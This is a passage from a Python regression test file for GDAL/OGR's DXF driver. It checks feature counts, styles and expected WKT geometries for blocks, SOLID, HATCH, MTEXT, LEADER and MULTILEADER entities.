        "19.9998864682387 4.59566860096071 0," + \
        "19.9901045311767 8.77297953637629 0," + \
        "19.9561154508277 12.9319876375154 0," + \
        "19.8980841092162 17.0525174342237 0," + \
        "19.8162920180808 21.1145801157289 0," + \
        "19.7111359532519 25.0984704969476 0," + \
        "19.5831260298811 28.9848626089156 0," + \
        "19.4328832278572 32.7549034496293 0," + \
        "19.2611363794148 36.390304440511 0," + \
        "19.0687186335478 39.8734301448397 0," + \
        "18.856563414379 43.1873838177704 0," + \
        "18.6256998930927 46.3160893729396 0," + \
        "18.3772479953948 49.2443693680303 0," + \
        "18.1124129687203 51.9580186309899 0," + \
        "17.8324795355432 54.4438731697361 0," + \
        "17.5388056611497 56.6898740310677 0," + \
        "17.2328159661089 58.6851257990001 0," + \
        "16.9159948153966 60.4199494487478 0," + \
        "16.5898791176976 61.8859292999569 0," + \
        "16.2560508698165 63.075953841417 0," + \
        "15.9161294823645 63.9842502292107 0," + \
        "15.5717639239516 64.6064122909483 0," + \
        "15.2246247219914 64.9394219002396 0," + \
        "14.8763958589235 64.9816636177129 0," + \
        "14.5287666031655 64.7329325275591 0," + \
        "14.1834233144223 64.1944352315841 0," + \
        "13.8420412631059 63.3687839959484 0," + \
        "13.5062765035495 62.2599840789869 0," + \
        "13.1777578404393 60.8734143015838 0," + \
        "12.8580789274355 59.2158009543548 0," + \
        "12.5487905363114 57.2951851682141 0," + \
        "12.2513930341143 55.1208839066128 0," + \
        "11.9673291048407 52.7034447686764 0," + \
        "11.6979767509346 50.0545948224921 0," + \
        "11.4446426085565 47.1871837167582 0," + \
        "11.2085556090535 44.1151213467616 0," + \
        "10.9908610173775 40.8533103770683 0," + \
        "10.792614876371 37.4175739482608 0," + \
        "10.6147788838724 33.8245789184198 0," + \
        "10.4582157274918 30.0917550117071 0," + \
        "10.323684899688 26.2372102662631 0," + \
        "10.2118390134483 22.2796431915832 0," + \
        "10.1232206364439 18.2382520615003 0," + \
        "10.0582596590181 14.1326417827963 0," + \
        "10.0172712087756 9.98272879122447 0," + \
        "10.0172712087756 9.9827287912244 0," + \
        "13.3027626235603 8.26630944469236 0," + \
        "10.0 5.0 0," + \
        "10.0 5.0 0))"
    if ogrtest.check_feature_geometry(feat, expected_wkt) != 0:
        return 'fail'

    return 'success'
###############################################################################
# Test reading files with only INSERT content (#7006)
def ogr_dxf_36():
    """A file whose entities section holds only INSERTs must still yield one
    feature per INSERT when block-geometry merging is disabled (#7006)."""
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
    ds = ogr.Open('data/insert_only.dxf')
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)

    insert_count = ds.GetLayer(0).GetFeatureCount()
    return 'success' if insert_count == 5 else 'fail'
###############################################################################
# Create a blocks layer only
def ogr_dxf_37():
    """Create a DXF containing only a blocks layer, then read the block back."""
    out_ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_37.dxf')
    blocks_lyr = out_ds.CreateLayer('blocks')

    new_feat = ogr.Feature(feature_def=blocks_lyr.GetLayerDefn())
    new_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT (1 2)'))
    blocks_lyr.CreateFeature(new_feat)

    # Release references so the in-memory file is flushed.
    new_feat = None
    blocks_lyr = None
    out_ds = None

    # Read back with block inlining disabled so the blocks layer stays visible.
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
    in_ds = ogr.Open('/vsimem/ogr_dxf_37.dxf')
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)

    # The block we wrote must come back as the first feature.
    first_feat = in_ds.GetLayerByName('blocks').GetNextFeature()
    if first_feat is None:
        return 'fail'

    in_ds = None
    gdal.Unlink('/vsimem/ogr_dxf_37.dxf')
    return 'success'
###############################################################################
# Test degenerated cases of SOLID (#7038)
def ogr_dxf_38():
    """Degenerate SOLIDs (fewer than 4 distinct vertices) must collapse to a
    POINT or LINESTRING while keeping their pen style (#7038)."""
    ds = ogr.Open('data/solid-less-than-4-vertices.dxf')
    layer = ds.GetLayer(0)

    # Single-vertex SOLID -> POINT
    feature = layer.GetNextFeature()
    wkt = feature.GetGeometryRef().ExportToWkt()
    if wkt != 'POINT (0 2)' or feature.GetStyleString() != 'PEN(c:#000000)':
        gdaltest.post_reason('fail')
        feature.DumpReadable()
        return 'fail'

    # Two-vertex SOLID -> LINESTRING
    feature = layer.GetNextFeature()
    wkt = feature.GetGeometryRef().ExportToWkt()
    if wkt != 'LINESTRING (0.5 2.0,1 2)' or feature.GetStyleString() != 'PEN(c:#000000)':
        gdaltest.post_reason('fail')
        feature.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test correct reordering of vertices in SOLID (#7038, #7089)
def ogr_dxf_39():
    """SOLID vertices must be reordered into valid rings (#7038, #7089)."""
    ds = ogr.Open('data/solid-vertex-ordering.dxf')
    layer = ds.GetLayer(0)

    # 2D SOLID: plain WKT comparison.
    feature = layer.GetNextFeature()
    if feature.GetGeometryRef().ExportToWkt() != 'POLYGON ((0 5,1.5 2.5,1.5 0.0,0.0 2.5,0 5))':
        gdaltest.post_reason('fail')
        feature.DumpReadable()
        return 'fail'

    # 3D SOLID: ISO WKT so the Z dimension is reported.
    feature = layer.GetNextFeature()
    if feature.GetGeometryRef().ExportToIsoWkt() != 'POLYGON Z ((-10 13 123,10 10 123,5 12 123,8 13 123,-10 13 123))':
        gdaltest.post_reason('fail')
        feature.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test handling of OCS vs WCS for MTEXT (#7049)
def ogr_dxf_40():
    """An MTEXT anchored in an OCS must be transformed to WCS (#7049)."""
    ds = ogr.Open('data/mtext-ocs-reduced.dxf')
    feature = ds.GetLayer(0).GetFeature(5)

    geometry_matches = ogrtest.check_feature_geometry(feature, 'POINT (320000.0 5815007.5 0)') == 0
    if not geometry_matches:
        gdaltest.post_reason('fail')
        feature.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test handling of OCS vs WCS for SOLID, HATCH and INSERT (#7077, #7098)
def ogr_dxf_41():
    """Check OCS-to-WCS transformation of SOLID, HATCH and INSERT entities
    read from data/ocs2wcs3.dxf (#7077, #7098).

    Features are fetched by FID, so the test is independent of read order.
    Returns 'success' or 'fail' per the autotest convention.
    """
    ds = ogr.Open('data/ocs2wcs3.dxf')
    lyr = ds.GetLayer(0)

    # INSERT #1: OCS normal vector (0,0,-1)
    f = lyr.GetFeature(1)
    if ogrtest.check_feature_geometry(f, 'LINESTRING (45 20,25 20,25 40,45 40,45 20)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # INSERT #2: OCS normal vector (0,1/sqrt(2),-1/sqrt(2))
    f = lyr.GetFeature(3)
    if ogrtest.check_feature_geometry(f, 'LINESTRING Z (10.0 18.0 -76.3675323681472,-10.0 18.0 -76.3675323681472,-10.0 32.142135623731 -62.2253967444162,10.0 32.142135623731 -62.2253967444162,10.0 18.0 -76.3675323681472)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # INSERT #3: OCS normal vector (0.6,sqrt(8)/5,sqrt(8)/5) with
    # Y scale factor of 2 and rotation angle of 45 degrees
    f = lyr.GetFeature(5)
    if ogrtest.check_feature_geometry(f, 'LINESTRING Z (49.7198871869889 -21.8420670839387 75.1721817670195,34.1976071850546 -17.0401066991021 86.8340855568821,41.9587471852111 -48.595846365317 110.157893136607,57.4810271871454 -53.3978067501536 98.4959893467447,49.7198871869889 -21.8420670839387 75.1721817670195)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # HATCH: boundary tessellated into a single polygon, transformed to WCS.
    f = lyr.GetFeature(7)
    expected_wkt = "POLYGON Z ((-4.0 41.0121933088198 -132.936074863071," + \
        "-4.40490904691695 41.0186412752948 -132.929626896596," + \
        "-4.80797195119362 41.0379557758564 -132.910312396034," + \
        "-5.20735098749398 41.0700487479548 -132.878219423936," + \
        "-5.60122522671268 41.1147738668667 -132.833494305024," + \
        "-5.98779883832069 41.1719272128483 -132.776340959042," + \
        "-6.3653092782765 41.2412482008871 -132.707019971004," + \
        "-6.73203532517085 41.3224207688135 -132.625847403077," + \
        "-7.08630492796504 41.4150748183547 -132.533193353536," + \
        "-7.42650282954181 41.5187879025613 -132.429480269329," + \
        "-7.75107793130996 41.6330871519123 -132.315181019978," + \
        "-8.05855036528454 41.7574514303164 -132.190816741574," + \
        "-8.34751824139814 41.8913137111809 -132.05695446071," + \
        "-8.61666403927964 42.0340636627126 -131.914204509178," + \
        "-8.86476061535765 42.1850504306657 -131.763217741225," + \
        "-9.09067679789991 42.3435856058464 -131.604682566044," + \
        "-9.29338254447862 42.5089463628474 -131.439321809043," + \
        "-9.47195363834675 42.6803787556975 -131.267889416193," + \
        "-9.62557590231259 42.8571011554044 -131.091167016486," + \
        "-9.75354891089994 43.0383078137139 -130.909960358177," + \
        "-9.85528918386859 43.2231725368399 -130.725095635051," + \
        "-9.9303328465346 43.4108524524121 -130.537415719479," + \
        "-9.97833774476093 43.6004918524697 -130.347776319421," + \
        "-9.99908500497526 43.7912260949768 -130.157042076914," + \
        "-9.99248003210238 43.9821855460716 -129.966082625819," + \
        "-9.95855294086101 44.1724995450765 -129.775768626814," + \
        "-9.89745841845876 44.3613003741885 -129.586967797702," + \
        "-9.80947501931113 44.5477272147525 -129.400540957138," + \
        "-9.80947501928313 44.5477272147525 -129.400540957138," + \
        "1.0 44.5477272147525 -129.400540957138," + \
        "0.988343845952696 44.306453848479 -129.641814323412," + \
        "0.953429730181654 44.0663054100155 -129.881962761875," + \
        "0.895420438411614 43.828401582239 -130.119866589652," + \
        "0.814586436738996 43.5938515826157 -130.354416589275," + \
        "0.711304610594103 43.3637489915164 -130.584519180374," + \
        "0.586056507527265 43.1391666534406 -130.80910151845," + \
        "0.439426092011876 42.9211516749198 -131.027116496971," + \
        "0.272097022732443 42.7107205424238 -131.237547629467," + \
        "0.084849465052212 42.5088543830312 -131.43941378886," + \
        "-0.1214435464779 42.3164943899624 -131.631773781928," + \
        "-0.34582017860938 42.134537434302 -131.813730737589," + \
        "-0.587234283906729 41.9638318833721 -131.984436288519," + \
        "-0.844560278369735 41.8051736452522 -132.143094526639," + \
        "-1.11659838942566 41.6593024578878 -132.288965714003," + \
        "-1.40208024982283 41.5268984400915 -132.421369731799," + \
        "-1.69967481134424 41.4085789205144 -132.539689251376," + \
        "-2.00799455076879 41.3048955593753 -132.643372612515," + \
        "-2.32560193914507 41.216331776366 -132.731936395525," + \
        "-2.65101614421488 41.1433004967256 -132.804967675165," + \
        "-2.98271993473683 41.0861422259924 -132.862125945898," + \
        "-3.31916675451876 41.04512346241 -132.903144709481," + \
        "-3.65878793317664 41.0204354543892 -132.927832717502," + \
        "-4.0 41.0121933088198 -132.936074863071," + \
        "-4.0 41.0121933088198 -132.936074863071))"
    if ogrtest.check_feature_geometry(f, expected_wkt) != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # SOLID: vertices reordered and transformed to WCS.
    f = lyr.GetFeature(9)
    if ogrtest.check_feature_geometry(f, 'POLYGON Z ((-10.0 13.0 124,8.0 13.0 124,5.0 12.0 123,10.0 10.0 121,-10.0 13.0 124))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    return 'success'
###############################################################################
# Test insertion of blocks within blocks (#7106)

def ogr_dxf_42():
    """Verify nested block insertion in three driver modes.

    Checks feature counts and geometries with (a) default inlining+merging,
    (b) inlining disabled, and (c) merging disabled, plus the Block* fields
    reported for a nested INSERT when blocks are exposed as a layer.
    """

    # Inlining, merging
    ds = ogr.Open('data/block-insert-order.dxf')
    lyr = ds.GetLayer(0)
    if lyr.GetFeatureCount() != 2:
        gdaltest.post_reason( 'Defaults: Expected 2 features, found %d' % lyr.GetFeatureCount() )
        return 'fail'

    # No inlining, merging
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
    ds = ogr.Open('data/block-insert-order.dxf')
    gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)

    lyr = ds.GetLayerByName('entities')
    if lyr.GetFeatureCount() != 2:
        gdaltest.post_reason( 'No inlining: Expected 2 features on entities, found %d' % lyr.GetFeatureCount() )
        return 'fail'

    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(feat, 'POINT Z (8.0 2.5 6)') != 0:
        gdaltest.post_reason( 'Wrong geometry for first insertion point' )
        feat.DumpReadable()
        return 'fail'

    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(feat, 'POINT Z (-1 -2 -3)') != 0:
        gdaltest.post_reason( 'Wrong geometry for second insertion point' )
        feat.DumpReadable()
        return 'fail'

    lyr = ds.GetLayerByName('blocks')
    if lyr.GetFeatureCount() != 6:
        gdaltest.post_reason( 'No inlining: Expected 6 feature on blocks, found %d' % lyr.GetFeatureCount() )
        return 'fail'

    feat = lyr.GetFeature(3)
    if ogrtest.check_feature_geometry(feat, 'POINT Z (5 5 0)') != 0:
        gdaltest.post_reason( 'Wrong geometry for second insertion of BLOCK4 on BLOCK3' )
        feat.DumpReadable()
        return 'fail'

    feat = lyr.GetFeature(4)
    if ogrtest.check_feature_geometry(feat, 'POINT Z (-5.48795472456028 1.69774937525433 4.12310562561766)') != 0:
        gdaltest.post_reason( 'Wrong geometry for third insertion of BLOCK4 on BLOCK3' )
        feat.DumpReadable()
        return 'fail'

    # Attributes describing the nested insertion, checked field by field
    expected_fields = [
        ('BlockName', 'BLOCK4'),
        ('BlockScale', [0.4, 1.0, 1.5]),
        ('BlockAngle', 40),
        ('BlockOCSNormal', [0.6, 0.565685424949238, 0.565685424949238]),
        ('BlockOCSCoords', [5, 5, 0]),
        ('Block', 'BLOCK3'),
    ]
    for field_name, expected_value in expected_fields:
        if feat.GetField(field_name) != expected_value:
            gdaltest.post_reason( 'Wrong %s' % field_name )
            return 'fail'

    # Inlining, no merging
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
    ds = ogr.Open('data/block-insert-order.dxf')
    gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)

    lyr = ds.GetLayer(0)
    if lyr.GetFeatureCount() != 4:
        gdaltest.post_reason( 'Merging: Expected 4 features, found %d' % lyr.GetFeatureCount() )
        return 'fail'

    return 'success'
###############################################################################
# Ensure recursively-included blocks don't fail badly

def ogr_dxf_43():
    """A pair of blocks that INSERT each other must still yield one feature."""

    ds = ogr.Open('data/insert-recursive-pair.dxf')
    lyr = ds.GetLayer(0)

    if lyr.GetFeatureCount() == 1:
        return 'success'
    return 'fail'
###############################################################################
# General tests of LEADER and MULTILEADER entities (#7111)

def ogr_dxf_44():
    """Walk the features of data/leader-mleader.dxf in order.

    Each LEADER/MULTILEADER entity is rendered by the driver as one or more
    features (leader line(s), optional arrowhead polygon(s), optional text
    point), so the assertions below are strictly order-dependent.
    """

    ds = ogr.Open('data/leader-mleader.dxf')
    lyr = ds.GetLayer(0)

    # LEADER with default arrowhead, plus a couple of DIMSTYLE overrides
    # (6.0 arrowhead size and 1.5 scale factor)
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING Z (21 40 0,10 40 0,19.3125 34.6875 0,10.3125 34.6875 0,-13.5990791268758 34.6875 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Default (filled-triangle) arrowhead for the above LEADER
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON ((21.0 41.5,30 40,21.0 38.5,21.0 41.5))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Skip text
    f = lyr.GetNextFeature()

    # Basic LEADER with no dimension style or override information
    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'PEN(c:#ff0000)' \
            or ogrtest.check_feature_geometry(f, 'LINESTRING Z (-20.9782552979609 38.1443878852919 30,-12.2152357926375 44.793971841437 30,-13.7256166009765 49.0748560186272 30,-13.9025293262723 49.0416613258524 30)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'BRUSH(fc:#ff0000)' \
            or ogrtest.check_feature_geometry(f, 'POLYGON Z ((-20.9601206293303 38.1204894796201 30,-21.121645731992 38.035579873508 30,-20.9963899665916 38.1682862909638 30,-20.9601206293303 38.1204894796201 30))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # LEADER with a custom arrowhead that consists of a polygon and line
    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'PEN(c:#00ff00)' \
            or ogrtest.check_feature_geometry(f, 'LINESTRING Z (26.8 77.6 0,10 65 0,25 55 0,25 50 0,40 65 0,48 65 0,169.282571623465 65.0 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'BRUSH(fc:#00ff00)' \
            or ogrtest.check_feature_geometry(f, 'POLYGON ((27.2 80.4,30.4 82.8,32.8 79.6,29.6 77.2,27.2 80.4))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'PEN(c:#00ff00)' \
            or ogrtest.check_feature_geometry(f, 'LINESTRING Z (28.4 78.8 0,26.8 77.6 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Check that the very long text string in the MTEXT entity associated
    # to this LEADER is captured correctly
    f = lyr.GetNextFeature()
    if len( f.GetField('Text') ) != 319:
        gdaltest.post_reason( 'Wrong text length: got %d' % len( f.GetField('Text') ) )
        return 'fail'

    # MULTILEADER with custom arrowhead
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((26.8 32.6,10 20,25 10,25 5,40 20),(40 20,48 20))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON ((27.2 35.4,30.4 37.8,32.8 34.6,29.6 32.2,27.2 35.4))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING Z (28.4 33.8 0,26.8 32.6 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Text point for the MULTILEADER above; also check its label style
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POINT (50.0 22.0327421555252)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"Basic Multileader",p:7,s:4g,c:#000000)':
        gdaltest.post_reason( 'Wrong style string on MULTILEADER text' )
        f.DumpReadable()
        return 'fail'

    # There are three LEADERs, followed by two MULTILEADERs, without arrowheads.
    # In the first LEADER/MULTILEADER, the arrowhead is set to an empty block.
    # In the second LEADER/MULTILEADER, the arrowhead is too large to be displayed.
    # The third LEADER has the arrow turned off (this isn't possible for MULTILEADER).
    # We just check each of these to make sure there is no polygon (arrowhead) feature.
    for x in range(3):
        f = lyr.GetNextFeature()
        geom = f.GetGeometryRef()
        if geom.GetGeometryType() != ogr.wkbLineString25D:
            gdaltest.post_reason( 'Unexpected LEADER geometry, expected wkbLineString25D on iteration %d' % x )
            return 'fail'

    for x in range(2):
        f = lyr.GetNextFeature()
        geom = f.GetGeometryRef()
        if geom.GetGeometryType() != ogr.wkbMultiLineString:
            gdaltest.post_reason( 'Unexpected MULTILEADER geometry, expected wkbMultiLineString on iteration %d' % x )
            return 'fail'

        # Each arrowless MULTILEADER is followed by its text point
        f = lyr.GetNextFeature()
        geom = f.GetGeometryRef()
        if geom.GetGeometryType() != ogr.wkbPoint:
            gdaltest.post_reason( 'Unexpected MULTILEADER geometry, expected wkbPoint on iteration %d' % x )
            return 'fail'

    # MULTILEADER with multiple leader lines and formatted text
    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'PEN(c:#0000ff)' \
            or ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((7.6425115795681 -8.00285406769102,18.2 -20.0),(19.2913880067389 -13.9367332958948,18.2 -20.0),(18.2 -20.0,38 -20),(54.8204921137545 -22.5800753657327,60.2227692307692 -20.0),(60.2227692307692 -20.0,52.2227692307692 -20.0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'BRUSH(fc:#0000ff)' \
            or ogrtest.check_feature_geometry(f, 'POLYGON Z ((7.1420359016196 -8.4432726642857 0,5 -5 0,8.1429872575166 -7.56243547109634 0,7.1420359016196 -8.4432726642857 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'BRUSH(fc:#0000ff)' \
            or ogrtest.check_feature_geometry(f, 'POLYGON Z ((18.6352657907565 -13.8186312970179 0,20 -10 0,19.9475102227214 -14.0548352947716 0,18.6352657907565 -13.8186312970179 0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Note, the text actually is nine question marks, this is not an encoding error
    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'LABEL(f:"Calibri",it:1,t:"?????????",p:7,s:4g,w:40,c:#0000ff)' \
            or ogrtest.check_feature_geometry(f, 'POINT (40.0 -17.9846153846154)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Rotated MULTILEADER with scaled block content, block attributes, and
    # different leader color
    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'PEN(c:#ff00ff)' \
            or ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((-41.8919467995818 -22.8930851139176,-36.1215379759023 -17.6108145786645),(-36.1215379759023 -17.6108145786645,-44.0 -19.0))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON ((-40.7553616986189 -14.3661762772835,-44.6945927106677 -15.0607689879512,-44 -19,-40.0607689879512 -18.3054072893323,-40.7553616986189 -14.3661762772835),(-41.9142984770378 -17.0075519687798,-41.126452274628 -16.8686334266463,-40.9875337324945 -17.6564796290561,-41.7753799349043 -17.7953981711896,-41.9142984770378 -17.0075519687798),(-42.0532170191713 -16.2197057663701,-42.1921355613049 -15.4318595639603,-41.4042893588951 -15.2929410218268,-41.2653708167616 -16.0807872242365,-42.0532170191713 -16.2197057663701),(-42.7021446794476 -17.1464705109134,-42.563226137314 -17.9343167133231,-43.3510723397238 -18.0732352554567,-43.4899908818573 -17.2853890530469,-42.7021446794476 -17.1464705109134),(-42.8410632215811 -16.3586243085036,-43.6289094239909 -16.4975428506372,-43.7678279661244 -15.7096966482274,-42.9799817637146 -15.5707781060938,-42.8410632215811 -16.3586243085036))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Build the expected attribute text ('Apples' plus U+00B1); on Python 2
    # the u-literal needs exec and the result is compared as UTF-8 bytes.
    # NOTE(review): the encode() call must live in the Python 2 branch only —
    # on Python 3 the str + bytes concatenation below would raise TypeError.
    if version_info >= (3,0,0):
        test_text = 'Apples\u00B1'
    else:
        exec("test_text = u'Apples\u00B1'")
        test_text = test_text.encode('utf-8')

    f = lyr.GetNextFeature()
    if f.GetStyleString() != 'LABEL(f:"Arial",t:"' + test_text + '",p:2,s:1g,c:#ff0000,a:10)' \
            or f.GetField('Text') != test_text \
            or ogrtest.check_feature_geometry(f, 'POINT Z (-42.7597068401767 -14.5165110820149 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # MULTILEADER with no dogleg
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((-2.39659963256204 -14.5201521575302,-3.98423252456234 -23.1105237601191),(-26.0282877045921 -20.4748699216691,-3.98423252456233 -23.1105237601191))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Skip the four features rendered for the previous entity's block content
    for x in range(4):
        f = lyr.GetNextFeature()

    # MULTILEADER with no leader lines (block content only)
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING EMPTY') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'POLYGON ((-4.98423252456234 -22.1105237601191,-6.98423252456234 -22.1105237601191,-6.98423252456234 -24.1105237601191,-4.98423252456234 -24.1105237601191,-4.98423252456234 -22.1105237601191),(-5.78423252456234 -23.3105237601191,-5.38423252456234 -23.3105237601191,-5.38423252456234 -23.7105237601191,-5.78423252456234 -23.7105237601191,-5.78423252456234 -23.3105237601191),(-5.78423252456234 -22.9105237601191,-5.78423252456234 -22.5105237601191,-5.38423252456234 -22.5105237601191,-5.38423252456234 -22.9105237601191,-5.78423252456234 -22.9105237601191),(-6.18423252456234 -23.3105237601191,-6.18423252456234 -23.7105237601191,-6.58423252456234 -23.7105237601191,-6.58423252456234 -23.3105237601191,-6.18423252456234 -23.3105237601191),(-6.18423252456234 -22.9105237601191,-6.58423252456234 -22.9105237601191,-6.58423252456234 -22.5105237601191,-6.18423252456234 -22.5105237601191,-6.18423252456234 -22.9105237601191))') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # Skip one feature
    f = lyr.GetNextFeature()

    # LEADER with spline path
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'LINESTRING Z (75 -5 0,75.3293039686015 -5.27450166567948 0,75.686184437139 -5.54808513378289 0,76.0669570707518 -5.8208730793178 0,76.4679375345795 -6.09298817729179 0,76.8854414937615 -6.36455310271241 0,77.3157846134373 -6.63569053058724 0,77.7552825587464 -6.90652313592384 0,78.2002509948283 -7.17717359372979 0,78.6470055868223 -7.44776457901266 0,79.091861999868 -7.71841876678001 0,79.5311358991048 -7.98925883203941 0,79.9611429496723 -8.26040744979843 0,80.3781988167098 -8.53198729506465 0,80.7786191653568 -8.80412104284562 0,81.1587196607529 -9.07693136814892 0,81.5148159680374 -9.35054094598211 0,81.8432237523498 -9.62507245135277 0,82.1402586788297 -9.90064855926846 0,82.4022364126165 -10.1773919447368 0,82.6254726188496 -10.4554252827652 0,82.8062829626685 -10.7348712483614 0,82.9409831092127 -11.0158525165329 0,83.0258887236216 -11.2984917622873 0,83.0573154710347 -11.5829116606322 0,83.0315790165916 -11.869234886575 0,82.9452821800198 -12.1575745539156 0,82.8004070385963 -12.447864666659 0,82.603711185096 -12.7398802214393 0,82.3621180817583 -13.033390692038 0,82.0825511908225 -13.3281655522369 0,81.7719339745283 -13.6239742758175 0,81.4371898951149 -13.9205863365615 0,81.0852424148219 -14.2177712082505 0,80.7230149958886 -14.515298364666 0,80.3574311005547 -14.8129372795898 0,79.9954141910594 -15.1104574268035 0,79.6438877296422 -15.4076282800887 0,79.3097751785426 -15.704219313227 0,79 -16 0)') != 0:
        gdaltest.post_reason('fail')
        f.DumpReadable()
        return 'fail'

    # MULTILEADER with spline path including an arrowhead on one leader line,
    # and text on an angle
    f = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((97.9154085227223 -24.4884177083425,98.2307499443399 -23.8667044316857,98.5274844683239 -23.1977407715784,98.8076056908493 -22.4865892691047,99.0731072080911 -21.7383124653484,99.3259826162243 -20.9579729013935,99.568225511424 -20.1506331183241,99.8018294898652 -19.3213556572241,100.028788147723 -18.4752030591775,100.251095081172 -17.6172378652682,100.470743886388 -16.7525226165803,100.689728159546 -15.8861198541978,100.91004149682 -15.0230921192046,101.133677494386 -14.1685019526847,101.362629748419 -13.327411895722,101.598891855094 -12.5048844894007,101.844457410585 -11.7059822748045,102.101320011068 -10.9357677930177,102.371473252719 -10.199303585124,102.656910731711 -9.50165219220749,102.95962604422 -8.84787615535218,103.281612786421 -8.24303801564202,103.624864554489 -7.69220031416101,103.991374944599 -7.20042559199311,104.383137552927 -6.77277639022231,104.802145975646 -6.41431524993259,105.250393808933 -6.13010471220794,105.729874648962 -5.92520731813233,106.242582091908 -5.80468560878975,106.790509733946 -5.77360212526418,107.375651171252 -5.8370194086396,108.0 -6.0),(99.0 -4.0,99.2390786191346 -4.00918383080352,99.4787687119818 -4.01534615590692,99.7189331856537 -4.01916439926796,99.9594349472622 -4.02131598484443,100.200136903919 -4.02247833659411,100.440901962737 -4.02332887847475,100.681593030828 -4.02454503444416,100.922073015303 -4.02680422846008,101.162204823276 -4.03078388448032,101.401851361856 -4.03716142646263,101.640875538158 -4.0466142783648,101.879140259293 -4.0598198641446,102.116508432372 -4.07745560775981,102.352842964508 -4.1001989331682,102.588006762813 -4.12872726432755,102.821862734399 -4.16371802519564,103.054283542724 -4.20580126092676,103.285277318696 -4.25494915918985,103.514951346557 -4.31065239888725,103.743415181632 -4.37239063008777,103.970778379245 -4.43964350286021,104.19715049472 -4.51189066727337,104.422641083382 -4.58861177339606,104.647359700555 -4.66928647129708,104.871415901564 -4.75339441104525,105.094919241732 -4.84041524270936,105.317979276384 -4.92982861635822,105.540705560844 -5.02111418206063,105.763207650437 -5.11375158988541,105.985595100486 -5.20722048990135,106.207977466317 -5.30100053217725,106.430464303253 -5.39457136678194,106.653165166619 -5.4874126437842,106.876189611739 -5.57900401325284,107.099647193937 -5.66882512525668,107.323647468538 -5.7563556298645,107.548299990866 -5.84107517714513,107.773714316245 -5.92246341716736,108.0 